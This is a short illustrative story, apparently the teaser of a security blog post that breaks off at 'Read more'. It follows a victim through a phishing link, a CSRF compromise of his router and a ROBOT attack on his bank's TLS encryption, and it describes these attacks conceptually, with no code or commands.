It was late Friday afternoon when the email arrived saying he’d won a free cruise.

Philip quickly opened the email and clicked the link for more information, but there was nothing there.

What he didn’t know is that this cruise offer actually came from a hacker and not Cruise Giveaways of America. This was no ordinary link, either. That link exploited Philip’s home router using cross-site request forgery.  Whoever’s in control of the routers is also in control of the traffic, making the hacker the one in control.

It wasn’t Philip’s fault exactly; the exploit had been posted to Full Disclosure a full two months ago, but the vendor still hadn’t even released updates.

The cruise offer got Philip dreaming about vacations, and a few minutes later, he was wondering about the balance on his Bank of E savings account.

Just then, he opened up a new browser tab and started typing being certain to use HTTPS:// for the secure web site. HTTPS is not always as private as you might think it is, though. The request for this site activated malware on the hacked router, which sprang into action impersonating the bank’s secure server. As soon as Philip’s browser started negotiating a “secure” channel, the hacked router relayed information back to the hacker’s command and control infrastructure.

Among the information are secret keys Philip’s computer has selected and encrypted with the bank’s 2048-bit RSA public key. Normally, this encryption would be strong enough to resist years of cracking attempts but in this case, the bank’s web site is vulnerable to ROBOT and the encryption can be broken with relative ease.

The hacker’s ROBOT attack now instructs an army of hacked routers to get to work breaking the encryption.

This process involves repeatedly trying to connect to the server (Read more...)